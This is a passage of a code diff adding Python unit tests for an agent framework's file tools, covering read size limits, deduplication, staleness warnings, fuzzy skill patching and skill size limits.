||||
total_lines=5000,
|
||||
file_size=len(big_content) + 100, # bigger than content
|
||||
)
|
||||
result = json.loads(read_file_tool("/tmp/huge.txt", task_id="big"))
|
||||
self.assertIn("error", result)
|
||||
self.assertIn("safety limit", result["error"])
|
||||
self.assertIn("offset and limit", result["error"])
|
||||
self.assertIn("total_lines", result)
|
||||
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
def test_small_read_not_rejected(self, mock_ops):
|
||||
"""Normal-sized reads pass through fine."""
|
||||
mock_ops.return_value = _make_fake_ops(content="short\n", file_size=6)
|
||||
result = json.loads(read_file_tool("/tmp/small.txt", task_id="small"))
|
||||
self.assertNotIn("error", result)
|
||||
self.assertIn("content", result)
|
||||
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
@patch("tools.file_tools._get_max_read_chars", return_value=_DEFAULT_MAX_READ_CHARS)
|
||||
def test_content_under_limit_passes(self, _mock_limit, mock_ops):
|
||||
"""Content just under the limit should pass through fine."""
|
||||
mock_ops.return_value = _make_fake_ops(
|
||||
content="y" * (_DEFAULT_MAX_READ_CHARS - 1),
|
||||
file_size=_DEFAULT_MAX_READ_CHARS - 1,
|
||||
)
|
||||
result = json.loads(read_file_tool("/tmp/justunder.txt", task_id="under"))
|
||||
self.assertNotIn("error", result)
|
||||
self.assertIn("content", result)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# File deduplication
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestFileDedup(unittest.TestCase):
|
||||
"""Re-reading an unchanged file should return a lightweight stub."""
|
||||
|
||||
def setUp(self):
|
||||
clear_read_tracker()
|
||||
self._tmpdir = tempfile.mkdtemp()
|
||||
self._tmpfile = os.path.join(self._tmpdir, "dedup_test.txt")
|
||||
with open(self._tmpfile, "w") as f:
|
||||
f.write("line one\nline two\n")
|
||||
|
||||
def tearDown(self):
|
||||
clear_read_tracker()
|
||||
try:
|
||||
os.unlink(self._tmpfile)
|
||||
os.rmdir(self._tmpdir)
|
||||
except OSError:
|
||||
pass
|
||||
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
def test_second_read_returns_dedup_stub(self, mock_ops):
|
||||
"""Second read of same file+range returns dedup stub."""
|
||||
mock_ops.return_value = _make_fake_ops(
|
||||
content="line one\nline two\n", file_size=20,
|
||||
)
|
||||
# First read — full content
|
||||
r1 = json.loads(read_file_tool(self._tmpfile, task_id="dup"))
|
||||
self.assertNotIn("dedup", r1)
|
||||
|
||||
# Second read — should get dedup stub
|
||||
r2 = json.loads(read_file_tool(self._tmpfile, task_id="dup"))
|
||||
self.assertTrue(r2.get("dedup"), "Second read should return dedup stub")
|
||||
self.assertIn("unchanged", r2.get("content", ""))
|
||||
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
def test_modified_file_not_deduped(self, mock_ops):
|
||||
"""After the file is modified, dedup returns full content."""
|
||||
mock_ops.return_value = _make_fake_ops(
|
||||
content="line one\nline two\n", file_size=20,
|
||||
)
|
||||
read_file_tool(self._tmpfile, task_id="mod")
|
||||
|
||||
# Modify the file — ensure mtime changes
|
||||
time.sleep(0.05)
|
||||
with open(self._tmpfile, "w") as f:
|
||||
f.write("changed content\n")
|
||||
|
||||
r2 = json.loads(read_file_tool(self._tmpfile, task_id="mod"))
|
||||
self.assertNotEqual(r2.get("dedup"), True, "Modified file should not dedup")
|
||||
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
def test_different_range_not_deduped(self, mock_ops):
|
||||
"""Same file but different offset/limit should not dedup."""
|
||||
mock_ops.return_value = _make_fake_ops(
|
||||
content="line one\nline two\n", file_size=20,
|
||||
)
|
||||
read_file_tool(self._tmpfile, offset=1, limit=500, task_id="rng")
|
||||
|
||||
r2 = json.loads(read_file_tool(
|
||||
self._tmpfile, offset=10, limit=500, task_id="rng",
|
||||
))
|
||||
self.assertNotEqual(r2.get("dedup"), True)
|
||||
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
def test_different_task_not_deduped(self, mock_ops):
|
||||
"""Different task_ids have separate dedup caches."""
|
||||
mock_ops.return_value = _make_fake_ops(
|
||||
content="line one\nline two\n", file_size=20,
|
||||
)
|
||||
read_file_tool(self._tmpfile, task_id="task_a")
|
||||
|
||||
r2 = json.loads(read_file_tool(self._tmpfile, task_id="task_b"))
|
||||
self.assertNotEqual(r2.get("dedup"), True)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Dedup reset on compression
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestDedupResetOnCompression(unittest.TestCase):
|
||||
"""reset_file_dedup should clear the dedup cache so post-compression
|
||||
reads return full content."""
|
||||
|
||||
def setUp(self):
|
||||
clear_read_tracker()
|
||||
self._tmpdir = tempfile.mkdtemp()
|
||||
self._tmpfile = os.path.join(self._tmpdir, "compress_test.txt")
|
||||
with open(self._tmpfile, "w") as f:
|
||||
f.write("original content\n")
|
||||
|
||||
def tearDown(self):
|
||||
clear_read_tracker()
|
||||
try:
|
||||
os.unlink(self._tmpfile)
|
||||
os.rmdir(self._tmpdir)
|
||||
except OSError:
|
||||
pass
|
||||
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
def test_reset_clears_dedup(self, mock_ops):
|
||||
"""After reset_file_dedup, the same read returns full content."""
|
||||
mock_ops.return_value = _make_fake_ops(
|
||||
content="original content\n", file_size=18,
|
||||
)
|
||||
# First read — populates dedup cache
|
||||
read_file_tool(self._tmpfile, task_id="comp")
|
||||
|
||||
# Verify dedup works before reset
|
||||
r_dedup = json.loads(read_file_tool(self._tmpfile, task_id="comp"))
|
||||
self.assertTrue(r_dedup.get("dedup"), "Should dedup before reset")
|
||||
|
||||
# Simulate compression
|
||||
reset_file_dedup("comp")
|
||||
|
||||
# Read again — should get full content
|
||||
r_post = json.loads(read_file_tool(self._tmpfile, task_id="comp"))
|
||||
self.assertNotEqual(r_post.get("dedup"), True,
|
||||
"Post-compression read should return full content")
|
||||
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
def test_reset_all_tasks(self, mock_ops):
|
||||
"""reset_file_dedup(None) clears all tasks."""
|
||||
mock_ops.return_value = _make_fake_ops(
|
||||
content="original content\n", file_size=18,
|
||||
)
|
||||
read_file_tool(self._tmpfile, task_id="t1")
|
||||
read_file_tool(self._tmpfile, task_id="t2")
|
||||
|
||||
reset_file_dedup() # no task_id — clear all
|
||||
|
||||
r1 = json.loads(read_file_tool(self._tmpfile, task_id="t1"))
|
||||
r2 = json.loads(read_file_tool(self._tmpfile, task_id="t2"))
|
||||
self.assertNotEqual(r1.get("dedup"), True)
|
||||
self.assertNotEqual(r2.get("dedup"), True)
|
||||
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
def test_reset_preserves_loop_detection(self, mock_ops):
|
||||
"""reset_file_dedup does NOT affect the consecutive-read counter."""
|
||||
mock_ops.return_value = _make_fake_ops(
|
||||
content="original content\n", file_size=18,
|
||||
)
|
||||
# Build up consecutive count (read 1 and 2)
|
||||
read_file_tool(self._tmpfile, task_id="loop")
|
||||
# 2nd read is deduped — doesn't increment consecutive counter
|
||||
read_file_tool(self._tmpfile, task_id="loop")
|
||||
|
||||
reset_file_dedup("loop")
|
||||
|
||||
# 3rd read — counter should still be at 2 from before reset
|
||||
# (dedup was hit for read 2, but consecutive counter was 1 for that)
|
||||
# After reset, this read goes through full path, incrementing to 2
|
||||
r3 = json.loads(read_file_tool(self._tmpfile, task_id="loop"))
|
||||
# Should NOT be blocked or warned — counter restarted since dedup
|
||||
# intercepted reads before they reached the counter
|
||||
self.assertNotIn("error", r3)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Large-file hint
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestLargeFileHint(unittest.TestCase):
|
||||
"""Large truncated files should include a hint about targeted reads."""
|
||||
|
||||
def setUp(self):
|
||||
clear_read_tracker()
|
||||
|
||||
def tearDown(self):
|
||||
clear_read_tracker()
|
||||
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
def test_large_truncated_file_gets_hint(self, mock_ops):
|
||||
content = "line\n" * 400 # 2000 chars, small enough to pass char guard
|
||||
fake = _make_fake_ops(content=content, total_lines=10000, file_size=600_000)
|
||||
# Make to_dict return truncated=True
|
||||
orig_read = fake.read_file
|
||||
def patched_read(path, offset=1, limit=500):
|
||||
r = orig_read(path, offset, limit)
|
||||
orig_to_dict = r.to_dict
|
||||
def new_to_dict():
|
||||
d = orig_to_dict()
|
||||
d["truncated"] = True
|
||||
return d
|
||||
r.to_dict = new_to_dict
|
||||
return r
|
||||
fake.read_file = patched_read
|
||||
mock_ops.return_value = fake
|
||||
|
||||
result = json.loads(read_file_tool("/tmp/bigfile.log", task_id="hint"))
|
||||
self.assertIn("_hint", result)
|
||||
self.assertIn("section you need", result["_hint"])
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Config override
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestConfigOverride(unittest.TestCase):
|
||||
"""file_read_max_chars in config.yaml should control the char guard."""
|
||||
|
||||
def setUp(self):
|
||||
clear_read_tracker()
|
||||
# Reset the cached value so each test gets a fresh lookup
|
||||
import tools.file_tools as _ft
|
||||
_ft._max_read_chars_cached = None
|
||||
|
||||
def tearDown(self):
|
||||
clear_read_tracker()
|
||||
import tools.file_tools as _ft
|
||||
_ft._max_read_chars_cached = None
|
||||
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
@patch("hermes_cli.config.load_config", return_value={"file_read_max_chars": 50})
|
||||
def test_custom_config_lowers_limit(self, _mock_cfg, mock_ops):
|
||||
"""A config value of 50 should reject reads over 50 chars."""
|
||||
mock_ops.return_value = _make_fake_ops(content="x" * 60, file_size=60)
|
||||
result = json.loads(read_file_tool("/tmp/cfgtest.txt", task_id="cfg1"))
|
||||
self.assertIn("error", result)
|
||||
self.assertIn("safety limit", result["error"])
|
||||
self.assertIn("50", result["error"]) # should show the configured limit
|
||||
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
@patch("hermes_cli.config.load_config", return_value={"file_read_max_chars": 500_000})
|
||||
def test_custom_config_raises_limit(self, _mock_cfg, mock_ops):
|
||||
"""A config value of 500K should allow reads up to 500K chars."""
|
||||
# 200K chars would be rejected at the default 100K but passes at 500K
|
||||
mock_ops.return_value = _make_fake_ops(
|
||||
content="y" * 200_000, file_size=200_000,
|
||||
)
|
||||
result = json.loads(read_file_tool("/tmp/cfgtest2.txt", task_id="cfg2"))
|
||||
self.assertNotIn("error", result)
|
||||
self.assertIn("content", result)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
unittest.main()
|
||||
241
tests/tools/test_file_staleness.py
Normal file
241
tests/tools/test_file_staleness.py
Normal file
|
|
@ -0,0 +1,241 @@
|
|||
#!/usr/bin/env python3
|
||||
"""
|
||||
Tests for file staleness detection in write_file and patch.
|
||||
|
||||
When a file is modified externally between the agent's read and write,
|
||||
the write should include a warning so the agent can re-read and verify.
|
||||
|
||||
Run with: python -m pytest tests/tools/test_file_staleness.py -v
|
||||
"""
|
||||
|
||||
import json
|
||||
import os
|
||||
import tempfile
|
||||
import time
|
||||
import unittest
|
||||
from unittest.mock import patch, MagicMock
|
||||
|
||||
from tools.file_tools import (
|
||||
read_file_tool,
|
||||
write_file_tool,
|
||||
patch_tool,
|
||||
clear_read_tracker,
|
||||
_check_file_staleness,
|
||||
)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Helpers
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class _FakeReadResult:
|
||||
def __init__(self, content="line1\nline2\n", total_lines=2, file_size=100):
|
||||
self.content = content
|
||||
self._total_lines = total_lines
|
||||
self._file_size = file_size
|
||||
|
||||
def to_dict(self):
|
||||
return {
|
||||
"content": self.content,
|
||||
"total_lines": self._total_lines,
|
||||
"file_size": self._file_size,
|
||||
}
|
||||
|
||||
|
||||
class _FakeWriteResult:
|
||||
def __init__(self):
|
||||
self.bytes_written = 10
|
||||
|
||||
def to_dict(self):
|
||||
return {"bytes_written": self.bytes_written}
|
||||
|
||||
|
||||
class _FakePatchResult:
|
||||
def __init__(self):
|
||||
self.success = True
|
||||
|
||||
def to_dict(self):
|
||||
return {"success": True, "diff": "--- a\n+++ b\n@@ ...\n"}
|
||||
|
||||
|
||||
def _make_fake_ops(read_content="hello\n", file_size=6):
|
||||
fake = MagicMock()
|
||||
fake.read_file = lambda path, offset=1, limit=500: _FakeReadResult(
|
||||
content=read_content, total_lines=1, file_size=file_size,
|
||||
)
|
||||
fake.write_file = lambda path, content: _FakeWriteResult()
|
||||
fake.patch_replace = lambda path, old, new, replace_all=False: _FakePatchResult()
|
||||
return fake
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Core staleness check
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestStalenessCheck(unittest.TestCase):
|
||||
|
||||
def setUp(self):
|
||||
clear_read_tracker()
|
||||
self._tmpdir = tempfile.mkdtemp()
|
||||
self._tmpfile = os.path.join(self._tmpdir, "stale_test.txt")
|
||||
with open(self._tmpfile, "w") as f:
|
||||
f.write("original content\n")
|
||||
|
||||
def tearDown(self):
|
||||
clear_read_tracker()
|
||||
try:
|
||||
os.unlink(self._tmpfile)
|
||||
os.rmdir(self._tmpdir)
|
||||
except OSError:
|
||||
pass
|
||||
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
def test_no_warning_when_file_unchanged(self, mock_ops):
|
||||
"""Read then write with no external modification — no warning."""
|
||||
mock_ops.return_value = _make_fake_ops("original content\n", 18)
|
||||
read_file_tool(self._tmpfile, task_id="t1")
|
||||
|
||||
result = json.loads(write_file_tool(self._tmpfile, "new content", task_id="t1"))
|
||||
self.assertNotIn("_warning", result)
|
||||
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
def test_warning_when_file_modified_externally(self, mock_ops):
|
||||
"""Read, then external modify, then write — should warn."""
|
||||
mock_ops.return_value = _make_fake_ops("original content\n", 18)
|
||||
read_file_tool(self._tmpfile, task_id="t1")
|
||||
|
||||
# Simulate external modification
|
||||
time.sleep(0.05)
|
||||
with open(self._tmpfile, "w") as f:
|
||||
f.write("someone else changed this\n")
|
||||
|
||||
result = json.loads(write_file_tool(self._tmpfile, "new content", task_id="t1"))
|
||||
self.assertIn("_warning", result)
|
||||
self.assertIn("modified since you last read", result["_warning"])
|
||||
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
def test_no_warning_when_file_never_read(self, mock_ops):
|
||||
"""Writing a file that was never read — no warning."""
|
||||
mock_ops.return_value = _make_fake_ops()
|
||||
result = json.loads(write_file_tool(self._tmpfile, "new content", task_id="t2"))
|
||||
self.assertNotIn("_warning", result)
|
||||
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
def test_no_warning_for_new_file(self, mock_ops):
|
||||
"""Creating a new file — no warning."""
|
||||
mock_ops.return_value = _make_fake_ops()
|
||||
new_path = os.path.join(self._tmpdir, "brand_new.txt")
|
||||
result = json.loads(write_file_tool(new_path, "content", task_id="t3"))
|
||||
self.assertNotIn("_warning", result)
|
||||
try:
|
||||
os.unlink(new_path)
|
||||
except OSError:
|
||||
pass
|
||||
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
def test_different_task_isolated(self, mock_ops):
|
||||
"""Task A reads, file changes, Task B writes — no warning for B."""
|
||||
mock_ops.return_value = _make_fake_ops("original content\n", 18)
|
||||
read_file_tool(self._tmpfile, task_id="task_a")
|
||||
|
||||
time.sleep(0.05)
|
||||
with open(self._tmpfile, "w") as f:
|
||||
f.write("changed\n")
|
||||
|
||||
result = json.loads(write_file_tool(self._tmpfile, "new", task_id="task_b"))
|
||||
self.assertNotIn("_warning", result)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Staleness in patch
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestPatchStaleness(unittest.TestCase):
|
||||
|
||||
def setUp(self):
|
||||
clear_read_tracker()
|
||||
self._tmpdir = tempfile.mkdtemp()
|
||||
self._tmpfile = os.path.join(self._tmpdir, "patch_test.txt")
|
||||
with open(self._tmpfile, "w") as f:
|
||||
f.write("original line\n")
|
||||
|
||||
def tearDown(self):
|
||||
clear_read_tracker()
|
||||
try:
|
||||
os.unlink(self._tmpfile)
|
||||
os.rmdir(self._tmpdir)
|
||||
except OSError:
|
||||
pass
|
||||
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
def test_patch_warns_on_stale_file(self, mock_ops):
|
||||
"""Patch should warn if the target file changed since last read."""
|
||||
mock_ops.return_value = _make_fake_ops("original line\n", 15)
|
||||
read_file_tool(self._tmpfile, task_id="p1")
|
||||
|
||||
time.sleep(0.05)
|
||||
with open(self._tmpfile, "w") as f:
|
||||
f.write("externally modified\n")
|
||||
|
||||
result = json.loads(patch_tool(
|
||||
mode="replace", path=self._tmpfile,
|
||||
old_string="original", new_string="patched",
|
||||
task_id="p1",
|
||||
))
|
||||
self.assertIn("_warning", result)
|
||||
self.assertIn("modified since you last read", result["_warning"])
|
||||
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
def test_patch_no_warning_when_fresh(self, mock_ops):
|
||||
"""Patch with no external changes — no warning."""
|
||||
mock_ops.return_value = _make_fake_ops("original line\n", 15)
|
||||
read_file_tool(self._tmpfile, task_id="p2")
|
||||
|
||||
result = json.loads(patch_tool(
|
||||
mode="replace", path=self._tmpfile,
|
||||
old_string="original", new_string="patched",
|
||||
task_id="p2",
|
||||
))
|
||||
self.assertNotIn("_warning", result)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Unit test for the helper
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestCheckFileStalenessHelper(unittest.TestCase):
|
||||
|
||||
def setUp(self):
|
||||
clear_read_tracker()
|
||||
|
||||
def tearDown(self):
|
||||
clear_read_tracker()
|
||||
|
||||
def test_returns_none_for_unknown_task(self):
|
||||
self.assertIsNone(_check_file_staleness("/tmp/x.py", "nonexistent"))
|
||||
|
||||
def test_returns_none_for_unread_file(self):
|
||||
# Populate tracker with a different file
|
||||
from tools.file_tools import _read_tracker, _read_tracker_lock
|
||||
with _read_tracker_lock:
|
||||
_read_tracker["t1"] = {
|
||||
"last_key": None, "consecutive": 0,
|
||||
"read_history": set(), "dedup": {},
|
||||
"read_timestamps": {"/tmp/other.py": 12345.0},
|
||||
}
|
||||
self.assertIsNone(_check_file_staleness("/tmp/x.py", "t1"))
|
||||
|
||||
def test_returns_none_when_stat_fails(self):
|
||||
from tools.file_tools import _read_tracker, _read_tracker_lock
|
||||
with _read_tracker_lock:
|
||||
_read_tracker["t1"] = {
|
||||
"last_key": None, "consecutive": 0,
|
||||
"read_history": set(), "dedup": {},
|
||||
"read_timestamps": {"/nonexistent/path": 99999.0},
|
||||
}
|
||||
# File doesn't exist → stat fails → returns None (let write handle it)
|
||||
self.assertIsNone(_check_file_staleness("/nonexistent/path", "t1"))
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
unittest.main()
|
||||
174
tests/tools/test_skill_improvements.py
Normal file
174
tests/tools/test_skill_improvements.py
Normal file
|
|
@ -0,0 +1,174 @@
|
|||
"""Tests for skill fuzzy patching via tools.fuzzy_match."""
|
||||
|
||||
import json
|
||||
import os
|
||||
from pathlib import Path
|
||||
from unittest.mock import patch
|
||||
|
||||
import pytest
|
||||
|
||||
from tools.skill_manager_tool import (
|
||||
_create_skill,
|
||||
_patch_skill,
|
||||
_write_file,
|
||||
skill_manage,
|
||||
)
|
||||
|
||||
|
||||
SKILL_CONTENT = """\
|
||||
---
|
||||
name: test-skill
|
||||
description: A test skill for unit testing.
|
||||
---
|
||||
|
||||
# Test Skill
|
||||
|
||||
Step 1: Do the thing.
|
||||
Step 2: Do another thing.
|
||||
Step 3: Final step.
|
||||
"""
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Fuzzy patching
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class TestFuzzyPatchSkill:
|
||||
@pytest.fixture(autouse=True)
|
||||
def setup_skills(self, tmp_path, monkeypatch):
|
||||
skills_dir = tmp_path / "skills"
|
||||
skills_dir.mkdir()
|
||||
monkeypatch.setattr("tools.skill_manager_tool.SKILLS_DIR", skills_dir)
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
self.skills_dir = skills_dir
|
||||
|
||||
def test_exact_match_still_works(self):
|
||||
_create_skill("test-skill", SKILL_CONTENT)
|
||||
result = _patch_skill("test-skill", "Step 1: Do the thing.", "Step 1: Done!")
|
||||
assert result["success"] is True
|
||||
content = (self.skills_dir / "test-skill" / "SKILL.md").read_text()
|
||||
assert "Step 1: Done!" in content
|
||||
|
||||
def test_whitespace_trimmed_match(self):
|
||||
"""Patch with extra leading whitespace should still find the target."""
|
||||
skill = """\
|
||||
---
|
||||
name: ws-skill
|
||||
description: Whitespace test
|
||||
---
|
||||
|
||||
# Commands
|
||||
|
||||
def hello():
|
||||
print("hi")
|
||||
"""
|
||||
_create_skill("ws-skill", skill)
|
||||
# Agent sends patch with no leading whitespace (common LLM behaviour)
|
||||
result = _patch_skill("ws-skill", "def hello():\n print(\"hi\")", "def hello():\n print(\"hello world\")")
|
||||
assert result["success"] is True
|
||||
content = (self.skills_dir / "ws-skill" / "SKILL.md").read_text()
|
||||
assert 'print("hello world")' in content
|
||||
|
||||
def test_indentation_flexible_match(self):
|
||||
"""Patch where only indentation differs should succeed."""
|
||||
skill = """\
|
||||
---
|
||||
name: indent-skill
|
||||
description: Indentation test
|
||||
---
|
||||
|
||||
# Steps
|
||||
|
||||
1. First step
|
||||
2. Second step
|
||||
3. Third step
|
||||
"""
|
||||
_create_skill("indent-skill", skill)
|
||||
# Agent sends with different indentation
|
||||
result = _patch_skill(
|
||||
"indent-skill",
|
||||
"1. First step\n2. Second step",
|
||||
"1. Updated first\n2. Updated second"
|
||||
)
|
||||
assert result["success"] is True
|
||||
content = (self.skills_dir / "indent-skill" / "SKILL.md").read_text()
|
||||
assert "Updated first" in content
|
||||
|
||||
def test_multiple_matches_blocked_without_replace_all(self):
|
||||
"""Multiple fuzzy matches should return an error without replace_all."""
|
||||
skill = """\
|
||||
---
|
||||
name: dup-skill
|
||||
description: Duplicate test
|
||||
---
|
||||
|
||||
# Steps
|
||||
|
||||
word word word
|
||||
"""
|
||||
_create_skill("dup-skill", skill)
|
||||
result = _patch_skill("dup-skill", "word", "replaced")
|
||||
assert result["success"] is False
|
||||
assert "match" in result["error"].lower()
|
||||
|
||||
def test_replace_all_with_fuzzy(self):
|
||||
skill = """\
|
||||
---
|
||||
name: dup-skill
|
||||
description: Duplicate test
|
||||
---
|
||||
|
||||
# Steps
|
||||
|
||||
word word word
|
||||
"""
|
||||
_create_skill("dup-skill", skill)
|
||||
result = _patch_skill("dup-skill", "word", "replaced", replace_all=True)
|
||||
assert result["success"] is True
|
||||
content = (self.skills_dir / "dup-skill" / "SKILL.md").read_text()
|
||||
assert "word" not in content
|
||||
assert "replaced" in content
|
||||
|
||||
def test_no_match_returns_preview(self):
|
||||
_create_skill("test-skill", SKILL_CONTENT)
|
||||
result = _patch_skill("test-skill", "this does not exist anywhere", "replacement")
|
||||
assert result["success"] is False
|
||||
assert "file_preview" in result
|
||||
|
||||
def test_fuzzy_patch_on_supporting_file(self):
|
||||
"""Fuzzy matching should also work on supporting files."""
|
||||
_create_skill("test-skill", SKILL_CONTENT)
|
||||
ref_content = " function hello() {\n console.log('hi');\n }"
|
||||
_write_file("test-skill", "references/code.js", ref_content)
|
||||
# Patch with stripped indentation
|
||||
result = _patch_skill(
|
||||
"test-skill",
|
||||
"function hello() {\nconsole.log('hi');\n}",
|
||||
"function hello() {\nconsole.log('hello world');\n}",
|
||||
file_path="references/code.js"
|
||||
)
|
||||
assert result["success"] is True
|
||||
content = (self.skills_dir / "test-skill" / "references" / "code.js").read_text()
|
||||
assert "hello world" in content
|
||||
|
||||
def test_patch_preserves_frontmatter_validation(self):
|
||||
"""Fuzzy matching should still run frontmatter validation on SKILL.md."""
|
||||
_create_skill("test-skill", SKILL_CONTENT)
|
||||
# Try to destroy the frontmatter via patch
|
||||
result = _patch_skill("test-skill", "---\nname: test-skill", "BROKEN")
|
||||
assert result["success"] is False
|
||||
assert "structure" in result["error"].lower() or "frontmatter" in result["error"].lower()
|
||||
|
||||
def test_skill_manage_patch_uses_fuzzy(self):
|
||||
"""The dispatcher should route to the fuzzy-matching patch."""
|
||||
_create_skill("test-skill", SKILL_CONTENT)
|
||||
raw = skill_manage(
|
||||
action="patch",
|
||||
name="test-skill",
|
||||
old_string=" Step 1: Do the thing.", # extra leading space
|
||||
new_string="Step 1: Updated.",
|
||||
)
|
||||
result = json.loads(raw)
|
||||
# Should succeed via line-trimmed or indentation-flexible matching
|
||||
assert result["success"] is True
|
||||
|
|
@ -271,7 +271,7 @@ class TestPatchSkill:
|
|||
_create_skill("my-skill", VALID_SKILL_CONTENT)
|
||||
result = _patch_skill("my-skill", "this text does not exist", "replacement")
|
||||
assert result["success"] is False
|
||||
assert "not found" in result["error"]
|
||||
assert "not found" in result["error"].lower() or "could not find" in result["error"].lower()
|
||||
|
||||
def test_patch_ambiguous_match_rejected(self, tmp_path):
|
||||
content = """\
|
||||
|
|
@ -288,7 +288,7 @@ word word
|
|||
_create_skill("my-skill", content)
|
||||
result = _patch_skill("my-skill", "word", "replaced")
|
||||
assert result["success"] is False
|
||||
assert "matched" in result["error"]
|
||||
assert "match" in result["error"].lower()
|
||||
|
||||
def test_patch_replace_all(self, tmp_path):
|
||||
content = """\
|
||||
|
|
|
|||
215
tests/tools/test_skill_size_limits.py
Normal file
215
tests/tools/test_skill_size_limits.py
Normal file
|
|
@ -0,0 +1,215 @@
|
|||
"""Tests for skill content size limits.
|
||||
|
||||
Agent writes (create/edit/patch/write_file) are constrained to
|
||||
MAX_SKILL_CONTENT_CHARS (100k) and MAX_SKILL_FILE_BYTES (1 MiB).
|
||||
Hand-placed and hub-installed skills have no hard limit.
|
||||
"""
|
||||
|
||||
import json
|
||||
import os
|
||||
from pathlib import Path
|
||||
from unittest.mock import patch
|
||||
|
||||
import pytest
|
||||
|
||||
from tools.skill_manager_tool import (
|
||||
MAX_SKILL_CONTENT_CHARS,
|
||||
MAX_SKILL_FILE_BYTES,
|
||||
_validate_content_size,
|
||||
skill_manage,
|
||||
)
|
||||
|
||||
|
||||
@pytest.fixture(autouse=True)
|
||||
def isolate_skills(tmp_path, monkeypatch):
|
||||
"""Redirect SKILLS_DIR to a temp directory."""
|
||||
skills_dir = tmp_path / "skills"
|
||||
skills_dir.mkdir()
|
||||
monkeypatch.setattr("tools.skill_manager_tool.SKILLS_DIR", skills_dir)
|
||||
monkeypatch.setattr("tools.skills_tool.SKILLS_DIR", skills_dir)
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
return skills_dir
|
||||
|
||||
|
||||
def _make_skill_content(body_chars: int) -> str:
|
||||
"""Generate valid SKILL.md content with a body of the given character count."""
|
||||
frontmatter = (
|
||||
"---\n"
|
||||
"name: test-skill\n"
|
||||
"description: A test skill\n"
|
||||
"---\n"
|
||||
)
|
||||
body = "# Test Skill\n\n" + ("x" * max(0, body_chars - 15))
|
||||
return frontmatter + body
|
||||
|
||||
|
||||
class TestValidateContentSize:
|
||||
"""Unit tests for _validate_content_size."""
|
||||
|
||||
def test_within_limit(self):
|
||||
assert _validate_content_size("a" * 1000) is None
|
||||
|
||||
def test_at_limit(self):
|
||||
assert _validate_content_size("a" * MAX_SKILL_CONTENT_CHARS) is None
|
||||
|
||||
def test_over_limit(self):
|
||||
err = _validate_content_size("a" * (MAX_SKILL_CONTENT_CHARS + 1))
|
||||
assert err is not None
|
||||
assert "100,001" in err
|
||||
assert "100,000" in err
|
||||
|
||||
def test_custom_label(self):
|
||||
err = _validate_content_size("a" * (MAX_SKILL_CONTENT_CHARS + 1), label="references/api.md")
|
||||
assert "references/api.md" in err
|
||||
|
||||
|
||||
class TestCreateSkillSizeLimit:
|
||||
"""create action rejects oversized content."""
|
||||
|
||||
def test_create_within_limit(self, isolate_skills):
|
||||
content = _make_skill_content(5000)
|
||||
result = json.loads(skill_manage(action="create", name="small-skill", content=content))
|
||||
assert result["success"] is True
|
||||
|
||||
def test_create_over_limit(self, isolate_skills):
|
||||
content = _make_skill_content(MAX_SKILL_CONTENT_CHARS + 100)
|
||||
result = json.loads(skill_manage(action="create", name="huge-skill", content=content))
|
||||
assert result["success"] is False
|
||||
assert "100,000" in result["error"]
|
||||
|
||||
def test_create_at_limit(self, isolate_skills):
|
||||
# Content at exactly the limit should succeed
|
||||
frontmatter = "---\nname: edge-skill\ndescription: Edge case\n---\n# Edge\n\n"
|
||||
body_budget = MAX_SKILL_CONTENT_CHARS - len(frontmatter)
|
||||
content = frontmatter + ("x" * body_budget)
|
||||
assert len(content) == MAX_SKILL_CONTENT_CHARS
|
||||
result = json.loads(skill_manage(action="create", name="edge-skill", content=content))
|
||||
assert result["success"] is True
|
||||
|
||||
|
||||
class TestEditSkillSizeLimit:
|
||||
"""edit action rejects oversized content."""
|
||||
|
||||
def test_edit_over_limit(self, isolate_skills):
|
||||
# Create a small skill first
|
||||
small = _make_skill_content(1000)
|
||||
json.loads(skill_manage(action="create", name="grow-me", content=small))
|
||||
|
||||
# Try to edit it to be oversized
|
||||
big = _make_skill_content(MAX_SKILL_CONTENT_CHARS + 100)
|
||||
# Fix the name in frontmatter
|
||||
big = big.replace("name: test-skill", "name: grow-me")
|
||||
result = json.loads(skill_manage(action="edit", name="grow-me", content=big))
|
||||
assert result["success"] is False
|
||||
